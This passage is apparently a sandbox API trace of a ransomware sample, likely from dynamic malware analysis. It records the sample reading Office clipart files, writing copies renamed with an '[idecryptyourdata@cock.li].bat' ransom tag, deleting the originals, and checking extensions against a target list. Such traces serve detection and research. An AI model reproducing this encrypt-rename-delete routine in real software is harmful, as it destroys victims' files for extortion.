Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.049] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif")) returned 1 [0070.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 68 [0070.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 68 [0070.051] lstrlenW (lpString=".doc") returned 4 [0070.051] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.051] lstrlenW (lpString=".docx") returned 5 [0070.051] lstrcmpiW (lpString1=".docx", lpString2="3.GIF") returned -1 [0070.051] lstrlenW (lpString=".pdf") returned 4 [0070.051] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.051] lstrlenW (lpString=".xls") returned 4 [0070.051] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.051] lstrlenW (lpString=".xlsx") returned 5 [0070.051] lstrcmpiW (lpString1=".xlsx", lpString2="3.GIF") returned -1 [0070.051] lstrlenW (lpString=".ppt") returned 4 [0070.051] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 68 [0070.051] lstrlenW (lpString=".zip") returned 4 [0070.052] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.052] lstrlenW (lpString=".rar") returned 4 [0070.052] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.052] lstrlenW (lpString=".bz2") returned 4 [0070.052] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.052] lstrlenW (lpString=".7z") returned 3 [0070.052] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 68 [0070.052] lstrlenW (lpString=".dbf") returned 4 [0070.052] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 68 [0070.052] lstrlenW (lpString=".1cd") returned 4 [0070.052] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF") returned 68 [0070.052] lstrlenW (lpString=".jpg") returned 4 [0070.052] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.053] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.053] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.056] GetLastError () returned 0x0 [0070.056] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3801, lpOverlapped=0x0) returned 1 [0070.062] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3810, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3810, lpOverlapped=0x0) returned 1 [0070.063] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.063] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.063] SetEndOfFile (hFile=0x380) returned 1 [0070.063] CloseHandle (hObject=0x380) returned 1 [0070.063] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.063] SetEndOfFile (hFile=0x368) returned 1 [0070.064] CloseHandle (hObject=0x368) returned 1 [0070.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.065] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif")) returned 1 [0070.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 68 [0070.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 68 [0070.065] lstrlenW (lpString=".doc") returned 4 [0070.065] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.065] lstrlenW (lpString=".docx") returned 5 [0070.065] lstrcmpiW (lpString1=".docx", lpString2="6.GIF") returned -1 [0070.065] lstrlenW (lpString=".pdf") returned 4 [0070.065] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.065] lstrlenW (lpString=".xls") returned 4 [0070.065] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.065] lstrlenW (lpString=".xlsx") returned 5 [0070.065] lstrcmpiW (lpString1=".xlsx", lpString2="6.GIF") returned -1 [0070.066] lstrlenW (lpString=".ppt") returned 4 [0070.066] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 68 [0070.066] lstrlenW (lpString=".zip") returned 4 [0070.066] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.066] lstrlenW (lpString=".rar") returned 4 [0070.066] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.066] lstrlenW (lpString=".bz2") returned 4 [0070.066] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.066] lstrlenW (lpString=".7z") returned 3 [0070.066] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 68 [0070.066] lstrlenW (lpString=".dbf") returned 4 [0070.066] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 68 [0070.066] lstrlenW (lpString=".1cd") returned 4 [0070.066] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF") returned 68 [0070.066] lstrlenW (lpString=".jpg") returned 4 [0070.066] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.067] GetLastError () returned 0x0 [0070.067] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x148b, lpOverlapped=0x0) returned 1 [0070.128] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1490, lpOverlapped=0x0) returned 1 [0070.129] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.129] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.129] SetEndOfFile (hFile=0x380) returned 1 [0070.129] CloseHandle (hObject=0x380) returned 1 [0070.129] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.129] SetEndOfFile (hFile=0x368) returned 1 [0070.130] CloseHandle (hObject=0x368) returned 1 [0070.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099198.gif")) returned 1 [0070.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 68 [0070.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 68 [0070.131] lstrlenW (lpString=".doc") returned 4 [0070.131] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.131] lstrlenW (lpString=".docx") returned 5 [0070.131] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1 [0070.131] lstrlenW (lpString=".pdf") returned 4 [0070.131] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.131] lstrlenW (lpString=".xls") returned 4 [0070.131] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.131] lstrlenW (lpString=".xlsx") returned 5 [0070.131] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1 [0070.131] lstrlenW (lpString=".ppt") returned 4 [0070.131] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 68 [0070.131] lstrlenW (lpString=".zip") returned 4 [0070.131] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.131] lstrlenW (lpString=".rar") returned 4 [0070.131] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.131] lstrlenW (lpString=".bz2") returned 4 [0070.131] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.131] lstrlenW (lpString=".7z") returned 3 [0070.131] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 68 [0070.131] lstrlenW (lpString=".dbf") returned 4 [0070.131] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 68 [0070.131] lstrlenW (lpString=".1cd") returned 4 [0070.131] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099198.GIF") returned 68 [0070.132] lstrlenW (lpString=".jpg") returned 4 [0070.132] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.132] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.132] GetLastError () returned 0x0 [0070.132] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1367, lpOverlapped=0x0) returned 1 [0070.147] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1370, lpOverlapped=0x0) returned 1 [0070.148] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.148] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.148] SetEndOfFile (hFile=0x380) returned 1 [0070.149] CloseHandle (hObject=0x380) returned 1 [0070.149] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.149] SetEndOfFile (hFile=0x368) returned 1 [0070.149] CloseHandle (hObject=0x368) returned 1 [0070.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.150] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099202.gif")) returned 1 [0070.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 68 [0070.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 68 [0070.150] lstrlenW (lpString=".doc") returned 4 [0070.150] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.150] lstrlenW (lpString=".docx") returned 5 [0070.150] lstrcmpiW (lpString1=".docx", lpString2="2.GIF") returned -1 [0070.150] lstrlenW (lpString=".pdf") returned 4 [0070.150] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.150] lstrlenW (lpString=".xls") returned 4 [0070.150] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.150] lstrlenW (lpString=".xlsx") returned 5 [0070.150] lstrcmpiW (lpString1=".xlsx", lpString2="2.GIF") returned -1 [0070.150] lstrlenW (lpString=".ppt") returned 4 [0070.150] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 68 [0070.150] lstrlenW (lpString=".zip") returned 4 [0070.150] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.150] lstrlenW (lpString=".rar") returned 4 [0070.150] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.150] lstrlenW (lpString=".bz2") returned 4 [0070.150] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.150] lstrlenW (lpString=".7z") returned 3 [0070.150] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 68 [0070.150] lstrlenW (lpString=".dbf") returned 4 [0070.151] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 68 [0070.151] lstrlenW (lpString=".1cd") returned 4 [0070.151] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099202.GIF") returned 68 [0070.151] lstrlenW (lpString=".jpg") returned 4 [0070.151] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.157] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.157] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.159] GetLastError () returned 0x0 [0070.159] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x45be, lpOverlapped=0x0) returned 1 [0070.193] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x45c0, lpOverlapped=0x0) returned 1 [0070.194] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.194] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.194] SetEndOfFile (hFile=0x36c) returned 1 [0070.194] CloseHandle (hObject=0x36c) returned 1 [0070.194] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.194] SetEndOfFile (hFile=0x340) returned 1 [0070.195] CloseHandle (hObject=0x340) returned 1 [0070.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.195] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf")) returned 1 [0070.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 68 [0070.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 68 [0070.196] lstrlenW (lpString=".doc") returned 4 [0070.196] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.196] lstrlenW (lpString=".docx") returned 5 [0070.196] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0070.196] lstrlenW (lpString=".pdf") returned 4 [0070.196] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.196] lstrlenW (lpString=".xls") returned 4 [0070.196] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.196] lstrlenW (lpString=".xlsx") returned 5 [0070.196] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0070.196] lstrlenW (lpString=".ppt") returned 4 [0070.196] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 68 [0070.196] lstrlenW (lpString=".zip") returned 4 [0070.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.196] lstrlenW (lpString=".rar") returned 4 [0070.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.196] lstrlenW (lpString=".bz2") returned 4 [0070.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.196] lstrlenW (lpString=".7z") returned 3 [0070.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 68 [0070.196] lstrlenW (lpString=".dbf") returned 4 [0070.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 68 [0070.197] lstrlenW (lpString=".1cd") returned 4 [0070.197] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF") returned 68 [0070.197] lstrlenW (lpString=".jpg") returned 4 [0070.197] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.197] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.197] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.197] GetLastError () returned 0x0 [0070.198] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x7ce0, lpOverlapped=0x0) returned 1 [0070.202] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7cf0, lpOverlapped=0x0) returned 1 [0070.204] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.204] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.204] SetEndOfFile (hFile=0x36c) returned 1 [0070.205] CloseHandle (hObject=0x36c) returned 1 [0070.205] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.205] SetEndOfFile (hFile=0x340) returned 1 [0070.206] CloseHandle (hObject=0x340) returned 1 [0070.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.206] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp")) returned 1 [0070.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 68 [0070.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 68 [0070.206] lstrlenW (lpString=".doc") returned 4 [0070.206] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.206] lstrlenW (lpString=".docx") returned 5 [0070.206] lstrcmpiW (lpString1=".docx", lpString2="9.BMP") returned -1 [0070.206] lstrlenW (lpString=".pdf") returned 4 [0070.206] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.206] lstrlenW (lpString=".xls") returned 4 [0070.207] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.207] lstrlenW (lpString=".xlsx") returned 5 [0070.207] lstrcmpiW (lpString1=".xlsx", lpString2="9.BMP") returned -1 [0070.207] lstrlenW (lpString=".ppt") returned 4 [0070.207] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 68 [0070.207] lstrlenW (lpString=".zip") returned 4 [0070.207] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.207] lstrlenW (lpString=".rar") returned 4 [0070.207] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.207] lstrlenW (lpString=".bz2") returned 4 [0070.207] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.207] lstrlenW (lpString=".7z") returned 3 [0070.207] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP") returned 68 [0070.207] lstrlenW (lpString=".dbf") returned 4 